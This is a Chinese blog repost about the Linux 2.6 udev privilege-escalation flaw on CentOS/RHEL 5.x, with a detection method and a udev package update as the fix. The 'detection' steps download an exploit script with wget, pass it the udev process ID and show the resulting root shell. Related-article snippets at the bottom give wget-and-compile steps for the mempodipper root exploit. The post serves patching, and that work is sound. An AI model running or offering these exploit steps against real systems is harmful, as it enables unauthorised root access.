关于Linux 2.6kernel udev 漏洞的检测及修补

最新推荐文章于 2025-05-29 18:34:02 发布
最新推荐文章于 2025-05-29 18:34:02 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: centos 文章标签: centos
本文详细介绍了近期发现的Linux udev漏洞,该漏洞影响CentOS/RHEL 5.x(除5.3版)及2.6内核系列。文章提供了检测漏洞的步骤以及如何通过升级udev软件包来解决此问题的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

转自:http://blog.chinaunix.net/uid-7387830-id-119510.html


最近闹的很凶的linux udev漏洞对2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路过使用受影响的linux系统的朋友一定要参考并升级,否则很容易出问题。这次可以通过任意web程序来实现攻击,而且成功率几乎100%。

请看过此帖的朋友帮忙顶一下帖,今天测了好几个服务器都有这个问题,全都修复了。

检测方法:

引用:
1)下载攻击脚本:
wget  http://www.extmail.org/source/exploit-udev-8478

2)获得udev进程号
执行: ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,然后将此数字减1作为
exploit-udev-8478的参数,例如命令结果为143则参数为142

3)执行:
sh exploit-udev-8478 142
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1#
然后id 看看:
uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限,如果无法获得root权限,要多执行脚本几次,一般第二次即可获得root权限。
解决/预防方法

唯一的就是要立刻升级udev软件包,此软件包升级后不需要重启动。方法很简单,请升级对应版本的官方最新udev,尤其要注意查看是否将这个漏洞补掉, EMOS 用户可以很简单的用yum升级:

yum update udev

升级完毕后再用检测方法检测一遍以确保没有问题!强烈建议再重新做检测时,执行以下命令清除掉上一次入侵成功的临时文件,否则升级完也会攻击成功的。

以root权限执行: 
引用:
rm -rf /tmp/libno_ex*
rm -rf /tmp/suid
rm -rf /tmp/udev

从零开始构建Linux
weixin_30379531的博客
01-26 1266
目的:深入了解以Linux内核为基础的系统是如何组成,运行,以构建一个最基础的,纯净的系统。 LFS构建步骤宿主机准备- linux操作系统安装- 使用独立硬盘,创建分区- 配置用户和组- 下载所有需要的软件包源代码准备开发环境构建一个基本开发环境构造完整的目标系统配置系统启动脚本启动系统 一、宿主系统准备1.1.安装所需要依赖包 [root@node ~]# yum install -...
linux2.6.32漏洞,Linux 2.6.39 到 3.2.0 爆提权漏洞
weixin_42526015的博客
05-16 1081
Linux 2.6.39 到 3.2.0 爆提权漏洞Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.ccc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:...
linux提权工具利用2.6内核漏洞
12-27
wunderbar_emporium-3.tgz linux提权工具 linux提权 2.6内核漏洞
linux 2.6 cpu漏洞,[转载]Linux kernel 2.6.udev 本地安全漏洞
weixin_39635648的博客
05-12 216
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a 'cat /proc/net/netlink'# and set the first arg to thi...
Linux内核CVE漏洞修复
最新发布
lionyy1的博客
05-29 272
从patch中可以看到,当前漏洞对应的C文件为:fs/nilfs2/inode.c如何确认当前漏洞是否需要修复?下面通过两个步骤来确认。通过这两步可以看到,当前漏洞对应文件没有被编译,所以针对该漏洞对当前内核没有影响,无需修复。
[zz]安全研究员发布针对Linux kernel 2.6 漏洞利用代码
weixin_30376163的博客
02-26 246
文章来源:milw0rm A researcher has released exploit codes for newly discovered Linux kernel 2.6 flaws which could permit attackers to gain root-system privileges they can use to steal data or mount ...
linux内核 漏洞扫描,关于Linux 2.6 kernel udev 漏洞检测修补
weixin_42480540的博客
04-30 339
最近闹的很凶的Linux udev漏洞2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证!请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路...
Linux 2.6内核发现重大漏洞 可导致系统崩溃
coleq的专栏
11-01 1914
Linux软件供应商Novell日前提醒其SuSE用户,在Linux内核2.6中发现了重大安全漏洞,该漏洞可能导致系统崩溃。   众所周知,Linux内核2.6是于去年年底完成的。新版内核针对企业用户而增加了诸多特征。但同时也留下了不少安全隐患。   此次发现的重大安全漏洞存在于2.6内核对iptables防火墙登录时的处理方式。该漏洞只影响采用基于iptables的防火墙系统,如SuSE Fir
linux提权总结8大类型,30多种方式
09-27
Linux Kernel 2.6 (Debian 4.0/Ubuntu/Gentoo) UDEV (1) | linux/local/8478.sh Linux Kernel 2.6.x/3.10.x/4.14.x (Red Hat/Debian/CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation | linux_x86...
AX99100在Linux下的多串口管理
本文详细介绍了AX99100多串口控制器的功能、硬件连接、初始化过程以及在Linux环境下的编程和高级应用。首先概述了AX99100的基本特性及其在硬件层面的连接与初始化要求。随后,文章深入探讨了多串口通信的基础知识、...
LinuxCNC内核模块开发:深入源码解锁内核级交互秘技
LinuxCNC内核模块是操作系统中负责管理计算机数控(CNC)硬件资源的组件,是LinuxCNC系统稳定运行的核心。本章将介绍LinuxCNC内核模块的基本概念、作用和重要性,为读者理解后续章节内容打下基础。 ## 1.1 LinuxCNC...
Linux内核机制深度探究:掌握设备驱动编写与调试的必备技巧
![Linux内核机制深度探究:掌握设备驱动编写与调试的必备技巧](https://dz2cdn1.dzone.com/storage/temp/13170384-picture1.png) ...本章将从Linux内核的基础知识开始,概述内核架构和设备驱动的概念,为读者构建
Linux kernel安全漏洞修复方法(CNNVD-202203-522、CVE-2022-0847)
zhangyuxun3的博客
03-30 2959
漏洞详情: Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。Linux kernel存在安全漏洞,攻击者可利用漏洞覆盖重写任意可读文件中的数据,从而将普通权限的用户提升到root权限用户。 漏洞评级: 高危漏洞 影响范围: Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102等版本均受此漏洞影响。 修复方案 本文以Centos7为例,具体操作步骤如下: #CentOS 7 上启用 ELRepo 仓库 rpm --impor
linux 2.6 内核漏洞,Linux 2.6.39 到 3.2.0 爆提权漏洞
weixin_36185435的博客
05-13 361
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.ccc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:Debian Wheezy Testing: 成功。...
linux 2.6.32.9 漏洞,Linux 2.6.39到3.2.0爆提权漏洞
weixin_32954401的博客
05-16 238
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wgetcc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker ReportFedora 1...
linux内核漏洞怎么修复,如何修复Linux内核存在的TCP漏洞
weixin_29061465的博客
05-16 542
卡内基梅隆大学的 CERT/CC 发出警告,称 Linux 内核 4.9 及更高版本中有一个 TCP 漏洞,该漏洞可使攻击者通过极小流量对系统发动 DoS (Denial-of-Service,拒绝服务)攻击。该漏洞是由诺基亚贝尔实验室支持的芬兰阿尔托大学网络部门的 Juha-Matti Tilli 发现的,目前已经被编号为 CVE-2018-5390,并且被 Red Hat 称为“Segment...
Linux kernel本地权限提升漏洞CentOS8升级内核的解决方案)
weixin_43075093的博客
06-11 1604
1、增强系统的安全性。 升级CentOS内核可以提供更好的安全性保障。新的内核版本通常包含了的安全补丁和漏洞修复,可以有效防止系统遭受恶意攻击,提高系统的稳定性和安全性。 2、优化硬件兼容性。 CentOS升级内核可以支持新硬件、解决bug、提升效率、支持新功能。升级到更新的内核提升系统的稳定性。 3、提升系统性能。 升级CentOS内核可以显著提升系统的性能。新的内核版本通常会对系统的调度算法、内存管理和文件系统等方面进行优化,进而提高系统的响应速度和整体性能。特别是在处理大量数据和高并发访问时,新的内核
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞修复方法--多种方式,亲测!!!
热门推荐
qq_21160025的博客
06-03 1万+
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞
Linux2.6内核移植与驱动开发指南
本文档详细记录了Linux 2.6内核在S3C2410X系统平台上的移植过程及驱动开发经验,旨在总结已有的工作成果,为后续的开发提供指导。Linux 2.6内核相较于2.4版本引入了许多新特性,对于嵌入式系统来说,这些新特性包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值